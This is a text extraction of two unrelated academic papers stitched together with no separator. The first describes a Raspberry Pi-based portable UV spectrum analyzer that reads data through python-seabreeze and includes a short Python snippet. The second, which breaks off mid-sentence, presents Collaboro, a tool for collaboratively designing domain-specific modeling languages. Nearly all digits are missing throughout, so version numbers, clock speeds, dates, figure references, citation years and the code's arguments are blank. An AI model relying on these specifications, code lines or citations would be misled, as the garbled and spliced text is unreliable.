international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - readings of portable uv spectrum analyzer data based on raspberry pi xu shuping school of computer science and engineering xi’an technological university xi’an, , china e-mail:xusp @ .com huang mengyao, xu pei school of computer science and engineering xi’an technological university xi’an, , china abstract—most of the spectrometer has the advantages of large volume, inconvenient carrying, slow data reading, long development cycle and high cost. in view of this situation, this paper presents a raspberry based portable spectrum analyzer. the general structure, working principle and data reading principle of the portable ultraviolet spectrum analyzer system based on raspberry faction are introduced in detail. and the raspberry sent a brief introduction, and finally introduced the raspberry pie to the development of the environment configuration, and the use of python-qt prepared control software for data read. the final test shows that the system interface is simple and friendly, stable operation, you can quickly read the data from the spectrometer, to meet the actual requirements. keywords-spectrometer; raspberry pi; working principle; data reading i. introduction the micro-spectrometer has advantages of modular structure and flexible construction, so inpractice, only a spectrometer is needed, and the software can detect different samples in realtime [ ]. at the same time, the micro-spectrometer has advantages of small size, easy to carry, compact internal structure, wide wavelength range, fast detection speed and low price. it has wide application development space in the field of industrial online monitoring and portable detection [ ]. at present, the portable spectrometer in domestic and foreign market has two main methods: electrochemical analysis and infrared spectrometry[ ]. the electrochemical analysis method has the advantages of simple structure and easy operation. it mainly depends on the gas sensor, and a gas sensor can only detect a corresponding gas, and the gas sensor also has a life limit, the use of a period of time, the sensitivity of the gas will be reduced, the need to replace gas sensors, and gas sensors are expensive, increasing the cost of use for the user. the main principle of the gas sensor is the use of gas oxidation or reduction reaction, the current, but if both the presence of oxidizing gas and reducing gas, the measurement results will be inaccurate [ ]. infrared spectroscopy overcomes the shortcomings of electrochemical analysis, but it can only measure the approximate concentration of nox, and it cannot accurately measure the specific concentration of no and no , and the infrared spectral analysis method is more complicated than the environment humidity, temperature, etc [ ]. based on the above problems, this paper presents a portable uv spectrometer developed using maya pro uv spectrometer and raspberry pi, according to the uv light wavelength nm- nm, the gas has good absorption of ultraviolet light, and the measurement is absorbed by the gas, after the uv light, which can read through the spectrometer wavelength and photon number. the ultraviolet spectral analysis has the advantages of high reliability, strong anti-interference, and a variety of gases can be measured at the same time, accurate measurement and so on. 
the portable spectrometer has the advantages of fast data reading speed, low cost, convenient on-line debugging, stable operation and simple operation, and achieves practical requirements. mailto:xusp @ .com international journal of advanced network, monitoring and controls volume , no. , ii. system architecture the portable uv spectrometer’s system architecture as shown in fig. , and system consists of three modules: data acquisition module, data processing module and man-machine interaction module. the data acquisition module is composed of sampling probe, flue gas sampling pump, ultraviolet light source and micro spectrum analyzer, and the main purpose is to complete the collection of gas, analyze the spectral data before and after the ultraviolet light source and micro-spectrometer, and transform the spectral data into digital signal to transmit to the data processing module. in fact, in the whole system, the micro-spectrometer is a very important sensor component, and the spectrometer is mainly composed of optical components, photoelectric conversion module (ccd), memory. the optical components are mainly for optical fiber incoming optical signal processing, photoelectric conversion module (ccd) after the optical processing of ultraviolet light into electrical signals, memory used to store electrical signals [ ]. at the core of the data center is the raspberry pi development board, then the task is to calculate the specific concentration of gases in the mixed gas by using the relevant algorithm. the man-machine interaction module is composed of a keyboard and an lcd screen, which is designed to visualize the concentration of gas and other related settings on line monitoring. figure . the overall architecture of the portable spectrometer the key component of the portable uv spectrum analyzer control and data processing is the raspberry pi development board. it is a micro-computer motherboard based on arm (shown in fig. ), and the board contains an arm cortex a microprocessor, then the main frequency is . ghz. it provides a m/ m ethernet socket and four usb connectors, uses a normal sd card as a hard drive, supports c, c++, python and other development languages. the above parts are integrated in a motherboard, with the basic functions of ordinary computers, compared with the traditional embedded development platform such as arm , arm , raspberry pi in the development efficiency, operation speed, market price and so on have obvious advantages. figure . raspberry pi b development board iii. data acquisition and reading principle of spectrometer a. principle of data acquisition the data acquisition of portable uv spectrometer is a process of collecting frames. when the spectrometer has collected a frame of data, will collect the spectral data into a queue, waiting for the raspberry pi sent instructions to read, and the raspberry pi reading spectral data is the process of usb or serial communication. the data read from the spectrometer is derived from the photoelectric conversion (ccd) module. the photoelectric conversion module used in the maya pro series spectrometer is a thin photoelectric conversion (ccd) array on the back of the science level. international journal of advanced network, monitoring and controls volume , no. , figure . data reading sequence diagram of spectrometer the data reading sequence of uv spectrometer is shown in figure . 
the spectrometer first receives the external triggering signal (high level, ns), at the same time, starts triggering the delay signal (low level), resets the ccd signal (low level signal), integration time signal (high level), and the data reads the signal (low level), idle time signal (low level), after receiving the external trigger signal again, then a data acquisition process is over, and the collected data is stored in memory. b. principle of data reading figure . schematic diagram of data reading of spectrometer international journal of advanced network, monitoring and controls volume , no. , one of the most important components of the uv spectrometer is the high-speed single-chip microcomputer. high-speed single-chip computer has a usb port (square port, usb . , mini b-type -pin) and serial port two interface (serial port for the -pin ocean spectrometer special interface) [ ]. the data reading process and principle of uv spectrometer are as follows: first, the optical components of the ultraviolet light processing, ultraviolet light through the slit to the collimating mirror, after collimation, the grating is assembled onto the ccd after the grating is divided, and the photons with different wavelengths will hit the different ccd pixels after the light is divided, and then the ccd element converts the ultraviolet signal into the electrical signal. this completes the spectrometer and the detection function. the signal information obtained from the data will be stored in the memory, then, the raspberry pi is connected with the spectrometer through a usb port, and the raspberry and spectrometer communicate with each other through the usb interface. finally, the raspberry sent to the spectrometer internal high-speed microcontroller to send instructions, and high-speed scm will be based on instructions, from the memory to obtain relevant information, and return the information to the raspberry pi. iv. raspberry pie development environment configuration and software programming a. python-seabreeze package working principle figure . how python reads the data development package works the python-seabreeze package is a two-time development package developed by the python language on the spectrometer and is the easiest way to access the maya pro-type ultraviolet spectrum analyzer in python language. it communicates with the spectrometer using the seabreeze library provided by ocean optics. any command sent by the raspberry pie to the ultraviolet spectrometer will use and rely on the seabreeze library. python-seabreeze is available as a prebuilt package on windows, linux, macos platforms in python . .x, . .x, . .x, and more. the package supports communication through the cseabreeze backend with the maya pro series ultraviolet spectrometer. in figure , the libseabreeze is a c + + language library ported from the seabreeze . api. the back end is packaged for the seabreeze library and uses the ocean optics open source seabreeze . api (using the "seabreezeapi.h") interface. almost all commands, such as the format command for communication with the spectrometer, are completed in the c/s library. as shown in figure , the python language reads the data of the ultraviolet spectrum spectrometer through the python programming interface provided by python-seabreeze, and invokes cseabreeze to read data from the ultraviolet spectrometer through the libseabreeze library. b. 
raspberry pi development environment configuration (the raspberry pi development board must be networked while configuring the environment)
1) install the python environment on linux. a typical linux system already has a python environment configured; if not, it has to be installed manually. python . is used in this article.
2) install the python-seabreeze package.
method one: in the linux terminal command window, input the command (the raspberry pi must be networked; the python-seabreeze installation takes a while, so please wait patiently): conda install -c poehlmann python-seabreeze. the raspberry pi will then download python-seabreeze and install and configure it automatically.
method two: download the python-seabreeze installation package from the internet, copy the installation package to the installation directory, execute the python setup.py command in the command box, and the installation and configuration proceed automatically.
after completing the two steps above, the installation environment is configured. because a raspberry pi is used, the recommended installation is berryconda (berryconda - . . -linux-armv l). berryconda is itself a python distribution that contains a large number of scientific computing packages, makes it easy to install third-party extension packages (conda can be used for rapid upgrades), supports cross-platform operation and easy program migration, and improves development efficiency; it also automatically installs the modules and dependencies required by the cseabreeze backend, saving a lot of time.
c. how the python data reading works
figure . data reading flowchart
when the raspberry pi reads the spectrometer data, it first reads the relevant information of the spectrometer device. if the device information is read successfully, the spectrometer device is initialized and the integration time and other parameters are set; if the device information is not read, the reading is restarted, and this cycle continues until the device information is read. second, after the spectrometer device initialization completes, the software starts to read the spectral data; the basic data read from the spectrometer are the light wavelengths and the photon counts. this completes the spectrometer data reading.
d. part of the raspberry pi data reading code is as follows:
#introduce related packages and device definitions
import seabreeze.spectrometers as sb  #import the python-seabreeze secondary development package
devices = sb.list_devices()
spec = sb.Spectrometer(devices[ ])  #define the spectrometer device
#device information
print spec.serial_number  #print the spectrometer factory serial number
print spec.model  #print the spectrometer model
print spec.pixels  #print the number of pixels the spectrometer can read at a time
#spectrometer data acquisition
spec.integration_time_micros( )  #set the spectrometer integration time
x = spec.wavelengths()
print x  #print spectrometer wavelength data
y = spec.intensities()  #print spectrometer photon number data
#drawing images using the readout wavelength and photon number
import matplotlib.pyplot as plt
plt.plot(x, y, color="green", linewidth= )
plt.xlabel("wavelengths")
plt.ylabel("integration")
plt.savefig("test .png", dpi= )
plt.show()
the drawing results are shown in the following illustrations: figure . wavelength of dark spectrum and photon number. figure .
wavelength of light spectrum and number of photons figures and are images drawn from the data (photon number and wavelength) that are read from the ultraviolet spectrometer. fig. is an image of the dark spectral wavelength and the number of photons, and fig. is the wavelength of the light spectrum and the number of photons (the horizontal axis is the wavelength and the longitudinal axes are photon numbers). dark spectrum, which means that without an external light source, and the spectral line caused by dark current in the ccd of ultraviolet spectrometer, when the ultraviolet spectrum is actually carried out, the number of photons measured by the detected gas needs to be reduced by the number of dark photons in order to get the actual photon number of the detected gas. it is shown from fig. that the number of dark spectral photons is about , , and the number of photons is related to the ambient temperature. e. software simulation the application is programmed with the python qt gui. after writing, then the software is simulated and tested on the raspberry pie to verify that the software function meets the design standard, and the software simulation results are shown in figure . finally, the raspberry pie and spectrometer were debugged online (fig. ). international journal of advanced network, monitoring and controls volume , no. , figure . software run interface figure . hardware and software online debugging v. conclusions this paper mainly introduces the working principle of micro ultraviolet spectrometer, data reading and so on, using the developed software after a long time test test shows: the theoretical analysis is correct, and the software has been written to achieve the raspberry pie from the micro-ultraviolet spectrometer read data, and work stable, fast, friendly interface, anti-interference ability, easy to operate and master. the system takes the raspberry pie as the core, realizes the data reading through two times development package, and carries on the software development through the python. the system has the advantages of short development cycle and stable operation, and achieves the practical goal. next, based on this, the gas iterative algorithm is studied, and the actual concentration of various gases is calculated by using an iterative algorithm for the photon number read by the raspberry pie from the ultraviolet spectrometer. vi. acknowledgment the authors wish to thank the cooperators. this research is partially funded by the project funds in shanxi province department of education ( jf ) and the project funds in shanxi province department of science industrial projects( gy ). references [ ] xu shuping, lichao. portable smoke analyzer based on arm [j]. computer measurement and control. . ( ): - [ ] lei tianxue. status of portable flue gas analyzer [j]. environmental monitoring management and technology, , ( ): . [ ] shi baosong, sun shouhong, zhang wei. application of ccd in portable spectral analyzer [j]. electronic measurement technology, ( ): - [ ] juwu ,wuyihui. micro-miniaturization of spectrometer [j].journal of instrumentation, . ( ): - [ ] yu zhiqiang, wenzhi yu, xieyingke, zhou suyi. the control system of multi-parameter water quality tester based on raspberry pie [j]. instrumentation technology and sensors, ( ): - . [ ] han xiao, wenzhi yu, xieyingke, wei kanglin, zhou xiaofeng. software design of control and signal processing system for multi-parameter water quality tester [j]. instrumentation technology and sensors, ( ): - [ ] lichao. 
design of a portable smoke analyzer controller based on arm [d]. xian: xi ' an university of technology, [ ] zhang yi. design of portable multifunctional flue gas analyzer [d]. xian: xi ' an university of technology, . collaboro: a collaborative (meta) modeling tool collaboro: a collaborative (meta) modeling tool javier luis cánovas izquierdo and jordi cabot , universitat oberta de catalunya (uoc), barcelona, spain institució catalana de recerca i estudis avançats (icrea), barcelona, spain abstract software development is becoming more and more collaborative, emphasizing the role of end-users in the development process to make sure the final product will satisfy customer needs. this is especially relevant when developing domain-specific modeling languages (dsmls), which are modeling languages specifically designed to carry out the tasks of a particular domain. while end-users are actually the experts of the domain for which a dsml is developed, their participation in the dsml specification process is still rather limited nowadays. in this paper, we propose a more community-aware language development process by enabling the active participation of all community members (both developers and end-users) from the very beginning. our proposal, called collaboro, is based on a dsml itself enabling the representation of change proposals during the language design and the discussion (and trace back) of possible solutions, comments and decisions arisen during the collaboration. collaboro also incorporates a metric-based recommender system to help community members to define high-quality notations for the dsmls. we also show how collaboro can be used at the model-level to facilitate the collaborative specification of software models. tool support is available both as an eclipse plug-in a web-based solution. subjects programming languages, software engineering keywords collaborative development, domain-specific languages, model-driven development introduction collaboration is key in software development, it promotes a continual validation of the software to be build (hildenbrand et al., ), thus guaranteeing that the final software will satisfy the users’ needs. furthermore, the sooner the end-users participate in the development life-cycle, the better, as several works claim (hatton & van genuchten, ; rooksby & ikeya, ; dullemond, van gameren & van solingen, ). when the software artefacts being developed target a very specific and complex domain, this collaboration makes even more sense. only the end-users have the domain knowledge required to drive the development. this is exactly the scenario we face when performing (meta) modeling tasks. on the one hand, end-users are key when defining a domain-specific modeling language (dsml), a modeling language specifically designed to perform a task in a certain domain (sánchez cuadrado & garcı́a molina, ). clearly, to be useful, the concepts and notation of a dsml should be as close as possible to the domain concepts and representation used by the end-users in their daily practice (grundy et al., ). therefore, the role of domain experts during the dsml specification is vital, as noted by how to cite this article cánovas izquierdo and cabot ( ), collaboro: a collaborative (meta) modeling tool. peerj comput. sci. :e ; doi . /peerj-cs. submitted may accepted august published october corresponding author javier luis cánovas izquierdo, jcanovasi@uoc.edu academic editor marian gheorghe additional information and declarations can be found on page doi . /peerj-cs. 
copyright cánovas izquierdo and cabot distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:jcanovasi@�uoc.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ several authors (kelly & pohjonen, ; mernik, heering & sloane, ; völter, ; bariši�c et al., ). unfortunately, nowadays, participation of end-users is still mostly restricted to the initial set of interviews to help designers analyze the domain and/or to test the language at the end (also scarcely done as reported by gabriel, goulão & amaral ( )), which requires the development of fully functional language toolsets (including a model editor, a parser, etc.) (mernik, heering & sloane, ; cho, gray & syriani, ). this long iteration cycle is a time-consuming and repetitive task that hinders the process performance (kelly & pohjonen, ) since end-users must wait until the end to see if designers correctly understood all the intricacies of the domain. on the other hand, those same end-users will then employ that modeling language (or any general-purpose (modeling) language like uml) to specify the systems to be built. collaboration here is also key in order to enable the participation of several problem experts in the process. recently, modeling tools have been increasingly enabling the collaborative development of models defined with either general-purpose languages (gpls) or dsmls. however, their support for asynchronous collaboration is still limited, specially when it comes to the traceability and justification of modeling decisions. existing project management tools such as trac (http://trac.edgewall.org/) or jira (http://www.atlassian.com/es/software/jira/overview) provide the environments required to develop collaboratively software systems. these tools enable the end-user participation during the process, thus allowing developers to receive feedback at any time (cabot & wilson, ). however, their support is usually defined at file level, meaning that discussions and change tracking are expressed in terms of lines of textual files. this is a limitation when developing or using modeling languages, where a special support to discuss at language element level (i.e., domain concepts and notation symbols) is required to address the challenges previously described and therefore promote the participation of end-users. as mentioned above, a second major problem shared by current solutions is the lack of traceability of the design decisions. the rationale behind decisions made during the language/model specification are implicit so it is not possible to understand or justify why, for instance, a certain element of the language was created with that specific syntax or given that particular type. this hampers the future evolution of the language/model. in order to alleviate these shortcomings, we define a dsml called collaboro, which enables the involvement of the community (i.e., end-users and developers) in the development of (meta) modeling tasks. it allows modeling the collaborations between community members taking place during the definition of a new dsml. collaboro supports both the collaborative definition of the abstract (i.e., metamodel) and concrete (i.e., notation) syntaxes for dsmls by providing specific constructs to enable the discussion. 
also, it can be easily adapted to enable the collaborative definition of models. thus, each community member has the chance to request changes, propose solutions and give an opinion (and vote) on those from others. we believe this discussion enriches the language definition and usage significantly, and ensures that the end result satisfies as much as possible the expectations of the end-users. moreover, the explicit recording of these interactions provides plenty of valuable information to explain the language evolution and justify all design decisions behind it, as also proposed in requirements cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://trac.edgewall.org/ http://www.atlassian.com/es/software/jira/overview http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ engineering (jureta, faulkner & schobbens, ). together with the collaboro dsml, we provide the tooling infrastructure and process guidance required to apply collaboro in practice. in this paper we will use the term collaboro to refer to both the dsml and the developed tooling. the first version of collaboro, which supported the collaborative development of textual dsmls in an eclipse-based environment, was presented in a previous work by (cánovas izquierdo & cabot, ). since then, the approach has evolved to include new features such as: ( ) better support for the collaborative development of graphical dsmls; ( ) a new architecture which includes a web-based front-end, thus promoting usability and participation for end-users; ( ) a metric-based recommender system, which checks the dsmls under development to spot possible issues according to quality metrics for both the domain and the notation (relying on moody’s cognitive framework (moody, )); and ( ) the development of several cases studies, which have allowed us to improve the general expressiveness and usability of our approach. additionally, in this paper we describe how our tool could be easily adapted to support collaborative modeling. paper structure. the first two sections describe the proposal and approach to develop dsml collaborative. the following section shows then how our approach could be easily adapted to use any modeling language to model collaboratively. next, the implemented tool and a case study are described. finally, we review the related work and draw some conclusions and future work. collaborative (meta) modeling while collaboration is crucial in both defining modeling languages and then using them to model concrete systems, the collaborative aspects of language development are more challenging and less studied since collaboration must cover both the definition of a new notation for the language and the specification of the language primitives themselves. therefore, we will present first collaboro in the context of collaborative language development and later its adaptation to cover the simpler modeling scenario. a running example, also introduced in this section, will help to illustrate the main concepts of such collaborations. a dsml is defined through three main components (kleppe, ): abstract syntax, concrete syntax, and semantics. the abstract syntax defines both the language concepts and their relationships, and also includes well-formedness rules constraining the models that can be created. metamodeling techniques are normally used to define the abstract syntax. 
the concrete syntax defines a notation (textual, graphical or hybrid) for the concepts in the abstract syntax, and a translational approach is normally used to provide semantics, though most of the time it is not explicitly formalized. the development of a dsml usually consists in five different phases (mernik, heering & sloane, ): decision, analysis, design, implementation and deployment. the first three phases are mainly focused on the dsml definition whereas the implementation phase is aimed at developing the tooling support (i.e., modeling environment, parser, etc.) for the dsml. clearly, the community around the language is a key element in the the collaborative definition of the semantics of a new dsml is out of the scope of this paper and considered as part of future work. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ process. in this paper we use the term community to refer to what is known as communities of practice, which is defined as groups of people informally bound together by shared expertise and passion for a joint enterprise (tamburri, lago & vliet, ). in this case, the dsml community covers the group of people involved in its development, which includes both technical level users (i.e., language developers) and domain expert users (i.e., end-users of the language), where both categories can overlap. as a running example, imagine the development of a dsml to facilitate the planification of the baggage claim service in airports. let’s assume that the airport baggage service needs to specify every morning the full daily assignment of flights to baggage claim conveyors so that operators can know well in advance how to configure the actual baggage system. for that, developers and domain experts (i.e., baggage managers) collaborate to define a dsml that serves this purpose. typically, domain experts are only involved at the very beginning and very end of the dsml development process. assuming this is also the case for our example, during the analysis phase, developers would study the domain with the help of the baggage managers and decide that the dsml should include concepts such as flight, bag and conveyors to organize the baggage delivery. developers would design and later implement the tooling of the language, thus coming up with a textual dsml like, for instance, the one shown in fig. (both abstract and concrete syntax proposals are shown, except for the elements included in grey-filled boxes that are added later as explained in what follows). note that the concrete syntax is illustrated by means of a sample model conforming to the abstract syntax, other possible notations could be defined. once the language is developed, end-users can play with it and check whether it fits their needs. quite often, if the end-users only provided the initial input but did not closely follow how that was interpreted during the language design, they might detect problems in the dsml environment (e.g., missing concepts, wrong notation, etc.) that will trigger a new (and costly) iteration to modify the language and recreate all the associated tools. for instance, end-users could detect that the language lacks a construct to represent the capacity of conveyors, that may help them to perform a better assignment. figure abstract syntax and an example of concrete syntax of the baggage claim dsml (grey-filled boxes represent elements added after the collaboration). 
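since the figure itself is not reproduced here, a minimal python sketch can make the running example more concrete. it only illustrates what an instance of such an abstract syntax could contain: the concept and reference names (flight, conveyor, claims, capacity) follow the running example, while the remaining attribute names and all concrete values are invented for illustration, and the capacity attribute is the one added later as a result of the collaboration.
from dataclasses import dataclass, field
from typing import List

@dataclass
class Conveyor:
    identifier: str
    capacity: float = 0.0        # attribute requested by the end-users during the collaboration

@dataclass
class Flight:
    number: str
    arrival: str                 # attribute later flagged by the recommender as lacking a symbol
    bags: int = 0
    claims: List[Conveyor] = field(default_factory=list)   # conveyors assigned to the flight

# one possible daily assignment, expressed as a model instance
c2 = Conveyor("C2", capacity=120.0)
morning_plan = [Flight("IB3214", arrival="10:30", bags=95, claims=[c2])]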
cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ developers can also overlook design constraints and recommendations that could improve the dsml quality. for instance, constructs in the abstract syntax not having a concrete syntax definition could become an issue (e.g., arrival attribute in flight concept). the collaboration tasks can go beyond the definition of new dsml and can cover the usage of well-known gpls, like uml. let’s imagine for instance the collaborative definition of class diagrams in order to identify the domain of a new software artefact. in fact, we could even reuse the running example to illustrate this scenario. thus, the definition of the abstract syntax of the previous dsml requires the collaborative creation of a uml class diagram. in this sense, end-users (i.e., domain experts) use a common language (i.e., uml) to create a new model required for a particular purpose (in this case, the definition of a dsml). as before, end-users can propose changes to the model, which can after be discussed and eventually accepted/rejected in the final version. our aim is to incorporate the community collaboration aspect into all dsml definition phases, making the phases of the process more participative and promoting the early detection of possible bugs or problems. as we will see, this support also enables de collaborative creation of models conforming to modeling languages. next section will present our approach. making dsml development collaborative we propose a collaborative approach to develop dsmls following the process summarized in fig. . roughly speaking, the process is as follows. once there is an agreement to create the language, developers get the requirements from the end-users to create a preliminary version of the language to kickstart the actual collaboration process (step ). this first version should include at least a partial abstract syntax but could also include a first concrete syntax draft (see dsml definition). an initial set of sample models are also defined by the developers to facilitate an example-based discussion, usually easier for non-technical users. sample models are rendered according to the current concrete syntax definition (see rendered examples). it is worth noting that the rendering is done on-the-fly without the burden of generating the dsml tooling since we are just showing the snapshots of the models to discuss the notation, not actually providing at this point a full modeling environment. now the community starts working together in order to shape the language (step ). community members can propose ideas or changes to the dsml, e.g., they can ask for modifications on how some concepts should be represented (both at the abstract and concrete syntax levels). these change proposals are shared in the community, who can also suggest and discuss how to improve the change proposals themselves. all community members can also suggest solutions for the requested changes and give their opinion on the solutions presented by others. at any time, rendering the sample models with the latest proposals helps members to have an idea of how a given proposal will evolve the language (if accepted). during this step, a recommender system (see recommender) also checks the current dsml definition to spot possible issues according to quality metrics for dsmls. if the recommender system detects possible improvements, it will cánovas izquierdo and cabot ( ), peerj comput. 
sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ create new proposals to be also discussed by the community. all these proposals and solutions (see collaborations) are eventually accepted or rejected. acceptance/rejection depends on whether the community reaches an agreement regarding the proposal/solution. for that, community members can vote (step ). a decision engine (see decision engine) then takes these votes into account to calculate which collaborations are accepted/rejected by the community. the engine could follow an automatic process but a specific role of community manager could also be assigned to a member/s to consolidate the proposals and get a consensus on conflicting opinions (e.g., when there is no agreement between technical and business considerations). once an agreement is reached, the contents of the solution are incorporated into the language, thus creating a new version. the process keeps iterating until no more changes are proposed. note that these changes on the language may also have an impact on the model examples which may need to be updated to comply with the new language definition. at the end of the collaboration, the final dsml definition is used as a starting point to implement a full-fledge dsml tooling (see dsml tooling) with the confidence that it has been validated by the community (e.g., transforming/importing the dsml definition into language workbenches like xtext or graphical modeling framework (gmf)). note that even when the language does not comply with commonly applied quality patterns, developers can be sure that it at least fulfills the end-users’ needs. moreover, all aspects of the collaboration are recorded (see collaboration history), thus keeping track of every interaction and change performed in the language. thus, at any moment, this traceability information can be queried (e.g., using standard object constraint language (ocl) (object management group, a) expressions) to discover the rationale behind the elements of the language (e.g., the argumentation provided for its acceptance). to illustrate our approach, the development of the baggage claim dsml mentioned above could have been the result of the imaginary collaboration scenario depicted in fig. . after developers completed a first version of the language, the collaboration figure collaborative development of dsmls. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ begins with a community member detecting the need of expressing the capacity of the conveyors. since now we are still in the definition phase, the community has the chance to discuss the best way to adapt the language to support this new information. the member that identified the problem would create a change proposal with that aim, and if the change is deemed as important by the community, other members could propose a solution/s to adapt the language. as an example, fig. graphically depicts a possible collaboration scenario assuming a small community of one end-user and two developers. each collaboration is represented as a bubble, and each step has been numbered. in the figure, end-user proposes a language change (step ), which is accepted by the community (step ), and then developer specifies a solution (step ). the solution is rejected by end-user , including also the explanation of the rejection (step ). 
as the rejection is accepted (step ), the developer redefines the solution, which is eventually accepted (step ) and the changes are then incorporated into the language. the resulting changes in the abstract and concrete syntaxes are shown in grey-filled boxes in fig. . clearly, it is important to make this collaboration iterations as quick as possible and with the participation of all the community members. moreover, the discussion information itself must be preserved to justify the rationale behind each language evolution, from which design decisions can be derived. the recommender system may also participate in the collaboration and eventually improve the dsml. after checking the dsml definition, the recommender may detect that not all the attributes in the abstract syntax have a direct representation in the concrete syntax, as it happens with the arrival attribute of the flight concept (as we will explain later, this is the result of applying the metric called symbol deficit). thus, the system may create a new proposal informing about the situation and then the community could vote and eventually decide whether the dsml has to be modified. our proposal for enabling the collaborative definition of dsmls is built on top of the collaboro dsml, a dsml for modeling the collaborations that arise in a community figure example of collaboration in the baggage claim dsml. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ working towards the development of a dsml for that community. in the next sections, we will describe how collaboro makes the collaboration feasible by: � enabling the discussion about dsml elements, � providing the metaclasses for representing collaborations and giving support to the decision-making process, � providing a metric-based recommender that can help to develop high-quality dsmls. representing the elements of a dsml to be able to discuss about changes on the dsml to-be, we must be able to represent both its abstract syntax (i.e., the concepts of the dsml) and its concrete syntax (the notation to represent those concepts) elements. additionally, to improve the understanding of how changes in its definition affect the dsml, we provide a mechanism to automatically render dsml examples using the concrete syntax notation under development. abstract syntax the abstract syntax of a dsml is commonly defined by means of a metamodel written using a metamodeling language (e.g., meta-object facility (mof) (object management group, b) or ecore (steinberg et al., )). metamodeling languages normally offer a limited set of concepts to be used when creating dsml metamodels (like types, relationship or hierarchy). a dsml metamodel is then defined as an instantiation of this metamodeling concepts. figure a shows an excerpt of the well-known ecore metamodeling language, on which we rely to represent the abstract syntax of dsmls. concrete syntax regarding the concrete syntax, since the notation of a dsml is also domain-specific, to promote the discussion, we need to be able to explicitly represent the notational elements proposed for the language. thanks to this, community members will have the freedom to create a notation specially adapted to their domain, thus avoiding coupling with other existing notations (e.g., java-based textual languages or uml-like diagrams). the type of notational elements to represent largely depends on the kind of concrete syntax envisioned (textual or graphical). 
nowadays, there are some tool-specific metamodels to represent either graphical or textual concrete syntaxes (like the ones included in gmf (http://eclipse.org/gmf-tooling), graphiti (https://eclipse.org/graphiti) and xtext (http://eclipse.org/xtext)), or to interchange model-level diagrams (object management group, b). however, a generic metamodel covering both graphical and textual syntaxes (and combinations of both) is not typically available in other tools. therefore, we contribute in this paper our own metamodel for concrete syntaxes. figure b shows an excerpt of the core elements of this notation metamodel. as can be seen, the metamodel is not exhaustive, but it is a lightweight solution that suffices to discuss about the concrete syntax elements most commonly used in the definition of graphical, textual or hybrid concrete syntaxes (offering a good trade-off cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://eclipse.org/gmf-tooling https://eclipse.org/graphiti http://eclipse.org/xtext http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ between expressiveness and manageability of the description in order to render and analyze/recommend changes). note that, with this metamodel, it is possible to describe how to represent each language concept, thus facilitating keeping track of language notation changes. concrete syntax elements are classified following the notationelement hierarchy, which includes graphical elements (graphicalelement metaclass), textual elements (textualelement metaclass), composite elements (composite metaclass) and references to the concrete syntax of other abstract elements (syntaxof metaclass) to be used in composite patterns. the main graphical constructs are provided by the graphicalelement hierarchy, which allows referring to external pictures (external metaclass), building figures (see figure hierarchy), lines (line metaclass) and labels for the dsml elements. a label (label metaclass) serves as a container for a textual element. textual elements can be defined with the textualelement hierarchy, which includes tokens, keywords and values directly taken from the abstract syntax elements expressed in a textual form (value metaclass). it is possible to obtain the textual representation from either an attribute (attvalue metaclass) by specifying the attribute to be queried (attribute reference), or a reference (refvalue metaclass) by specifying both the reference (reference reference) and the attribute of the referred element to be used (attribute reference). the attribute separator of the value metaclass allows defining the separator for multivalued elements. the composite element can be used to define complex concrete syntax structures, allowing both graphical and textual composites but also hybrids. finally, the syntaxof metaclass allows referencing to already specified concrete syntax definitions of abstract syntax elements, thus allowing modularization and (b) (a) estructuralfeature eattribute ereference etypedelement eclassifier eclass edatatype eenum eenumliteral epackage .. ..* ..* +etype ereference <<from ecore package>> notationelement syntaxofcomposite graphicalelement x : int y : int height : int width : int labelfigure line token keyword .. ..* subelems reference id : string textualelement separator : string value refvalueattvalue .. eattribute <<from ecore package>> attribute .. ereference <<from ecore package>> reference .. text .. .. separator ..* .. 
..* ..* ..* external path: string notationdefinition ..* elements ovalrectangle polygon fill : color stroke : color ..* figure excerpts of the (a) ecore and (b) notation metamodels used to represent, respectively, the abstract and concrete syntaxes of dsmls in collaboro. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ composition. the reference reference of the syntaxof metaclass specifies the reference to be queried to obtain the set of elements whereas the separator reference indicates the separator between elements. renderer the current dsml notation specification plus the set of example models for the dsml (expressed as instances of the dsml abstract syntax) can be used to generate concrete visual examples that help community members get a better idea of the language being built. we refer to this generator as renderer. the renderer takes, as inputs: ( ) the abstract and ( ) concrete syntaxes of the dsml, and ( ) the set of example models conforming to the abstract syntax; and returns a set of images representing the example models expressed according to the concrete syntax defined in the notation model (additional technical details about the render process will be given in the section describing the developed tooling). we believe the advantages of this approach is twofold. on the one hand, it is a lightweight mechanism to quickly validate the dsml without generating the dsml tooling support. on the other hand, developers and end-users participating in the collaboration can easily assess how the language looks like without the burden of dealing with the abstract and concrete syntax of dsml, which are expressed as metamodels. example figure a shows an example of the abstract syntax for the baggage claim dsml while fig. shows the notation model for the textual representation of the metaclass figure (a) textual representation example of the metaclass conveyor of the baggage claim dsml and (b) the corresponding notation model. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conveyor of such dsml (fig. a shows a textual example and fig. b shows the corresponding notation model). note that attvalue and refvalue metaclass instances are referring to elements from the abstract syntax metamodel. fig. b shows a possible renderization of a model for such language. representing the collaborations the third metamodel required in our process focuses on representing the collaborations that annotate/modify the dsml elements described before. this collaboration 